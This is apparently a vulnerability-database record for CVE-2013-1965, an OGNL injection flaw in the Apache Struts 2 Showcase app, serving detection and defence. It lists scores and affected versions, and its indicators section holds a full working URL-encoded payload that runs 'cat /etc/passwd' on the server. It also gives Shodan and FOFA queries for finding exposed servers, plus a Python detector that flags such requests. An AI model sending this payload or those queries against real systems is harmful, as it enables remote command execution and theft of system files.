cbcvebase.
CVE-2013-1965
published 2013-07-10


Priority: P276, critical
CVSS 2.0: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 93.81% (99.8th percentile)
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.

Affected

2 ranges
Vendor  Product           Version range         Fixed in
apache  struts            >= 2.0.0 < 2.3.14.1   2.3.14.1
apache  struts2-showcase  2.0.0 – 2.3.13

Detection & IOCs (extracted from sources)

url: /user.action
command: name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
  • Exploit targets POST requests to /user.action with a crafted OGNL payload in the 'name' parameter using URL-encoded %{...} expression syntax
  • Content-Type header is application/x-www-form-urlencoded for the exploit POST request
  • Successful exploitation returns HTTP 200 with /etc/passwd content matching root:.*:0:0: in the response body
  • Shodan queries to identify exposed Struts2 instances: http.html:"apache struts", http.title:"struts2 showcase", http.html:"struts problem report"
  • The second OGNL evaluation occurs when the redirect result reads the injected value from the stack and uses it as a redirect parameter, bypassing Struts and OGNL library protections
  • FOFA queries to identify exposed Struts2 instances: body="struts problem report", title="struts2 showcase", body="apache struts"
  • The vulnerability is specific to the Struts2 Showcase App (2.0.0–2.3.13); the exploit path /user.action is tied to the Showcase application and may differ in other deployments
  • Prior fixes for S2-003, S2-005, and S2-009 only partially closed the OGNL injection vector; this CVE exploits the redirect result evaluation path which those fixes did not address
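
A defender-side check built from the request indicators above, as an added example that is not part of the original record: it decodes a urlencoded form body, including double-encoded input, and flags OGNL expression syntax in parameter names or values. All function names and sample bodies are constructed for illustration (the samples carry only the harmless expression 1+1), and it accepts any .action path because the record notes the path may differ between deployments.

```python
import re
from urllib.parse import parse_qsl, unquote

# OGNL expression delimiters, %{...} or ${...}, as seen after decoding.
OGNL_EXPR = re.compile(r"[%$]\{.*?\}", re.S)
# Tokens that appear in the payload recorded on this page.
OGNL_TOKENS = ("java.lang.", "#context", "ProcessBuilder", "getWriter")

def fully_decode(text, max_rounds=3):
    """Undo extra layers of percent-encoding (parse_qsl removes the first)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def inspect_form_body(body):
    """Return sorted (parameter, where, reason) findings for a urlencoded body."""
    findings = set()
    for key, value in parse_qsl(body, keep_blank_values=True):
        key = fully_decode(key)
        for where, text in (("name", key), ("value", fully_decode(value))):
            if OGNL_EXPR.search(text):
                findings.add((key, where, "ognl-expression"))
            if any(tok in text for tok in OGNL_TOKENS):
                findings.add((key, where, "ognl-token"))
    return sorted(findings)

def inspect_request(method, path, content_type, body):
    """Apply the page's request indicators, then inspect the parameters."""
    if method.upper() != "POST" or not path.split("?")[0].endswith(".action"):
        return []
    if not content_type.lower().startswith("application/x-www-form-urlencoded"):
        return []
    return inspect_form_body(body)

# Constructed, harmless sample bodies (assumption: not taken from real traffic).
SAMPLES = {
    "benign": "name=alice&age=30",
    "encoded": "name=%25%7B1%2B1%7D",
    "double_encoded": "name=%2525%257B1%252B1%257D",
    "in_param_name": "%24%7B1%2B1%7D=x",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_request(
            "POST", "/user.action", "application/x-www-form-urlencoded", body))
```
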

CVSS provenance

nvd            v2.0  9.3  CRITICAL  AV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat        9.3  CRITICAL